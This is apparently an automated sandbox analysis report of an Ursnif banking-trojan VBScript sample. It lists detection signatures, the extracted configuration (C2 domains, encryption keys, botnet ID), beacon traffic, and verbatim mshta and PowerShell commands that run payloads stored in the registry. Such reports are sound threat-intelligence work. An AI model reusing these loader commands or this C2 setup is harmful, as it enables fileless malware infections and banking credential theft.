Windows Analysis Report start[526268].vbs

Overview

General Information

Sample Name: start[526268].vbs
Analysis ID: 480986
MD5: b0de0a696f7b17724fef5c5e0af2bd1d
SHA1: 3de72b8cae6a84f82e05cae18f48a1a302dbebc3
SHA256: e3a1fb3e932aae628aa08bde31be3b30861fa90ca16db4f81d7989093e1fddbe
Tags: vbs

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Launches processes in debugging mode, may be used to hinder debugging
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

AV Detection:

Found malware configuration
Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "4AYdzflNRXYlq5A89hwCjrU+QvoXxjpdUxRPAdq3bBwI9ExkYDjHy9AWeshiGXrgIzFlNVtLrifcFS4LJjRxWiTG6Fca4Vt6MI5WOos+fChdUStUtjzPhvjxLI5XIPSBz5r2O1dlmC1xuOEDpRs8BbpWGdZ2yYEdD2dU4efFbSK7SBcRAao3mGwKzc2GlmjegxJ/fScW81u3keNnZqy2SbgEIUg5Ycv4J3eUirSdWDASxFovB3C3eAKRiuRkEzJcRqU2y9vVOyCbmx6uiVNonJWQxMoDxpw6mwokGsvtDFEgCJXMl+lbKlUaqdSAUK0Tij5ay8sYpetWDvt4nCFDVBf09fSWTGo06hdy0B5+I4w=", "c2_domain": ["art.microsoftsofymicrosoftsoft.at", "r23cirt55ysvtdvl.onion", "fop.langoonik.com", "poi.redhatbabby.at", "pop.biopiof.at", "l46t3vgvmtx5wxe6.onion", "v10.avyanok.com", "apr.intoolkom.at", "fgx.dangerboy.at"], "ip_check_url": ["curlmyip.net", "ident.me", "l2.io/ip", "whatismyip.akamai.com"], "serpent_key": "rQH4gusjF0tL2dQz", "server": "580", "sleep_time": "5", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "600", "time_value": "600", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "240", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "240", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "2500", "SetWaitableTimer_value": "60"}
Antivirus detection for URL or domain
Source: http://atl.bigbigpoppa.com/NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: atl.bigbigpoppa.com Virustotal: Detection: 8%

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01203276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 34_2_01203276
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.391888818.000002CC178CF000.00000004.00000001.sdmp, fum.cpp.0.dr
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49790 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49791 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49791 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49792 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49793 -> 185.251.90.253:80
Source: Traffic Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49793 -> 185.251.90.253:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: SPRINTHOSTRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.251.90.253
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /JWEVOwMBnh_2FtPS/WMS3RPVZyjTSnTq/9Hxp202Yz5PgJEOrB6/nF_2FNmSa/SQyIRZk5j_2B3OcT7rdM/7npsCxfJSu8JbD_2FiM/y1HBEgDsmQFEPX27nGHHbz/zR0jF_2FnlVo0/Nxk3zALE/ofyPMDXzWjS1IpBinC5Sz4W/cf_2F5pD8G/46Dgl0akFp2cXbFnY/HwtGCbH5Q64m/f9VXk69LnhQ/x_2B8W86eQh4Rn/mNr7OMCC6GA9c9ph_2Bg7/ddhYlIa8YUPQgtGC/8R2fSBf4sQLaQ_2/FLycNJhDT_2FxWMMIH/41wPmVaCG/UdSw_2BuW4yZulffApAL/Gvq14U65qaj/9np83 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /gO6fEM48Z2VyJYyEaQk/Tlg2ka7bPKYxRb_2B442I_/2FFZLVL8c_2BN/KPEiurg_/2FQFW58y_2BC5_2BoQJsMfC/Z20kSl3bCK/Qe_2BCo_2BI8EhVfz/gaTQA1FJpKmh/Okd_2B3iR1p/U_2F_2F_2BxYfZ/z_2B8obDRzLj_2BvPtXpS/MutYXow3kjfHv8Ne/Tk41k1QbLs08co6/pw6aojLzb_2BsMklC7/1luisc2vx/yYmG1Q6eqChu6qOfd2lR/zgadpa0en2mVI5QE7we/rWllKXh4B6iqFxDAWQqk8G/Oj17QsJan3SWq/MhUPAmuR/Yiolc5JDgbwuOe67l9VgfXi/kgInUUiADdo06Z7N/8 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: atl.bigbigpoppa.com
Source: global traffic HTTP traffic detected: GET /fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: POST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 | Content-Length: 2 | Host: art.microsoftsofymicrosoftsoft.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Fri, 10 Sep 2021 05:02:45 GMT | Content-Type: text/html; charset=utf-8 | Content-Length: 146 | Connection: close | Vary: Accept-Encoding | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: powershell.exe, 00000027.00000002.677979658.0000019D8B650000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000027.00000002.678446802.0000019D8B851000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: unknown DNS traffic detected: queries for: atl.bigbigpoppa.com

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match (the same 21 memory-dump and unpacked-PE sources listed under Key, Mouse, Clipboard, Microphone and Screen Capturing above)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01203276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 34_2_01203276

System Summary:

Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01201754 34_2_01201754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01207E30 34_2_01207E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_0120725F 34_2_0120725F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CE95C 39_2_0000019D8B7CE95C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7DB948 39_2_0000019D8B7DB948
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7DB230 39_2_0000019D8B7DB230
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D5164 39_2_0000019D8B7D5164
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C1164 39_2_0000019D8B7C1164
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C4150 39_2_0000019D8B7C4150
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B0000 39_2_0000019D8B7B0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B2138 39_2_0000019D8B7B2138
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C0124 39_2_0000019D8B7C0124
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CA9F8 39_2_0000019D8B7CA9F8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C7820 39_2_0000019D8B7C7820
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B1000 39_2_0000019D8B7B1000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B90FC 39_2_0000019D8B7B90FC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C70C8 39_2_0000019D8B7C70C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D88B8 39_2_0000019D8B7D88B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CF7B4 39_2_0000019D8B7CF7B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7E4796 39_2_0000019D8B7E4796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CA790 39_2_0000019D8B7CA790
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B3610 39_2_0000019D8B7B3610
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D2EF8 39_2_0000019D8B7D2EF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B76F4 39_2_0000019D8B7B76F4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D5ED8 39_2_0000019D8B7D5ED8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CC6C4 39_2_0000019D8B7CC6C4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C2EC0 39_2_0000019D8B7C2EC0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D06B4 39_2_0000019D8B7D06B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D6EA0 39_2_0000019D8B7D6EA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C6684 39_2_0000019D8B7C6684
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C9500 39_2_0000019D8B7C9500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C1DF4 39_2_0000019D8B7C1DF4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D4DE0 39_2_0000019D8B7D4DE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C5DBC 39_2_0000019D8B7C5DBC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C559C 39_2_0000019D8B7C559C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D9408 39_2_0000019D8B7D9408
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D3400 39_2_0000019D8B7D3400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B74A4 39_2_0000019D8B7B74A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C4484 39_2_0000019D8B7C4484
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B4B60 39_2_0000019D8B7B4B60
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D4354 39_2_0000019D8B7D4354
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B1348 39_2_0000019D8B7B1348
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C8340 39_2_0000019D8B7C8340
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CD328 39_2_0000019D8B7CD328
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D730C 39_2_0000019D8B7D730C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7BABDC 39_2_0000019D8B7BABDC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7DA3A4 39_2_0000019D8B7DA3A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D4BA0 39_2_0000019D8B7D4BA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CBA74 39_2_0000019D8B7CBA74
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7B9AD8 39_2_0000019D8B7B9AD8
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_012040DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 34_2_012040DC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01208055 NtQueryVirtualMemory, 34_2_01208055
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CE95C NtSetContextThread,NtUnmapViewOfSection, 39_2_0000019D8B7CE95C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C1950 NtWriteVirtualMemory, 39_2_0000019D8B7C1950
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7CE860 NtQueryInformationProcess, 39_2_0000019D8B7CE860
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7DA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread, 39_2_0000019D8B7DA8F0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7D20A4 NtQueryInformationToken,NtQueryInformationToken, 39_2_0000019D8B7D20A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C8B90 NtMapViewOfSection, 39_2_0000019D8B7C8B90
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 39_2_0000019D8B7C5B80 NtCreateSection, 39_2_0000019D8B7C5B80
PE file does not import any functions
Source: 1cv1ijms.dll.41.dr Static PE information: No import functions for PE file found
Java / VBScript file with very long strings (likely obfuscated code)
Source: start[526268].vbs Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
